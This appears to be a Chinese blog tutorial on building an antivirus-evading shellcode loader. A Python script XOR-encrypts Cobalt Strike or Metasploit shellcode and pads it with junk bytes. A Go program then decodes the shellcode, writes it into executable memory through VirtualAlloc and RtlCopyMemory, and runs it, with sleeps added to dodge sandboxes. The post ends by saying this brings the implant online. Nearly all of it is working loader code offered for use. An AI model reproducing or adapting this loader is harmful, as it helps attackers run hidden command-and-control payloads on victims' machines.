go语言环境搭建
Golang学习日志 ━━ 下载及安装_golang下载-CSDN博客
go run xxx.go
go build xxx.go
首先,cs.msf生成比特流数据.
放入xor,py脚本中进行xor加密.
xor.py
def xor(shellcode, key):new_shellcode = ""key_len = len(key)# 对shellcode的每一位进行xor亦或处理for i in range(0, len(shellcode)):s = ord(shellcode[i])p = ord((key[i % key_len]))s = s ^ p # 与p异或,p就是key中的字符之一s = chr(s) new_shellcode += sreturn new_shellcodedef random_decode(shellcode):j = 0new_shellcode = ""for i in range(0,len(shellcode)):if i % 2 == 0:new_shellcode[i] = shellcode[j]j += 1return new_shellcodedef add_random_code(shellcode, key):new_shellcode = ""key_len = len(key)# 每个字节后面添加随机一个字节,随机字符来源于keyfor i in range(0, len(shellcode)):#print(ord(shellcode[i]))new_shellcode += shellcode[i]# print("&"+hex(ord(new_shellcode[i])))new_shellcode += key[i % key_len]#print(i % key_len)return new_shellcode# 将shellcode打印输出
def str_to_hex(shellcode):raw = ""for i in range(0, len(shellcode)):s = hex(ord(shellcode[i])).replace("0x",',0x')raw = raw + sreturn rawif __name__ == '__main__':shellcode=" 比特流shellcode!!!!! "# 这是异或和增加随机字符使用的keykey = "iqe"#print(shellcode[0])#print(len(shellcode))# 首先对shellcode进行异或处理shellcode = xor(shellcode, key)#print(len(shellcode))# 然后在shellcode中增加随机字符shellcode = add_random_code(shellcode, key)# 将shellcode打印出来print(str_to_hex(shellcode))xor_dec.go
package mainimport ("syscall""time""unsafe"
)const (MEM_COMMIT = 0x1000MEM_RESERVE = 0x2000PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。)var (kernel32 = syscall.MustLoadDLL("kernel32.dll")ntdll = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)func main() {mix_shellcode := []byte{ xor加密后的shellcode !!!!!! }var ttyolller []bytekey := []byte("iqe")var key_size = len(key)var shellcode_final []bytevar j = 0time.Sleep(2)// 去除垃圾代码//fmt.Print(len(mix_shellcode))for i := 0; i < len(mix_shellcode); i++ {if i%2 == 0 {shellcode_final = append(shellcode_final, mix_shellcode[i])j += 1}}time.Sleep(3)//fmt.Print(shellcode_final)// 解密异或for i := 0; i < len(shellcode_final); i++ {ttyolller = append(ttyolller, shellcode_final[i]^key[i%key_size])}time.Sleep(3)addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if err != nil && err.Error() != "The operation completed successfully." {syscall.Exit(0)}time.Sleep(3)_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))if err != nil && err.Error() != "The operation completed successfully." {syscall.Exit(0)}syscall.Syscall(addr, 0, 0, 0, 0)
}
运行xor_dec.go --->上线.
